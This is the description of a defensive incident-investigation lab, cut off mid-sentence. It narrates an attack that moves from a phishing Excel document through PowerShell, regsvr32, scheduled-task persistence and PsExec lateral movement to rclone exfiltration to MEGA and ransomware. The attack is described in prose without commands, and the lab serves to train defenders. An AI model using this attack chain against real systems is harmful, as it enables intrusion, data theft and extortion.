This lab presents a comprehensive investigation into a sophisticated cyberattack involving initial compromise through phishing, lateral movement, data exfiltration, and ransomware deployment. The attacker began by leveraging a malicious Excel document that initiated a PowerShell command to drop and execute a VBScript file. From there, the adversary escalated their activities by deploying various tools, including regsvr32.exe running a malicious DLL and schtasks.exe to establish persistence via scheduled tasks. Further persistence was achieved through registry modifications and the use of obfuscated PowerShell commands.
As the attack unfolded, the adversary downloaded and used several dual-use and administrative tools such as netscan.exe for internal network reconnaissance, PsExec64.exe for lateral movement, and bitsadmin and curl for file transfers. Once the attacker had achieved a foothold on the domain controller, a privileged domain account was used to conduct data staging. Sensitive files were compressed using PowerShell’s Compress-Archive cmdlet and later exfiltrated using the rclone tool, which uploaded the data to the MEGA cloud storage platform. Following exfiltration, a custom ransomware binary was executed to encrypt files, appending a unique extension and dropping ransom notes.
Throughout this lab, the defender is challenged to uncover each stage of the attack by analyzing Sysmon, Windows event logs, PowerShell command history, and file system activity. By tracing the attacker’s steps—from initial access to data exfiltration and impact&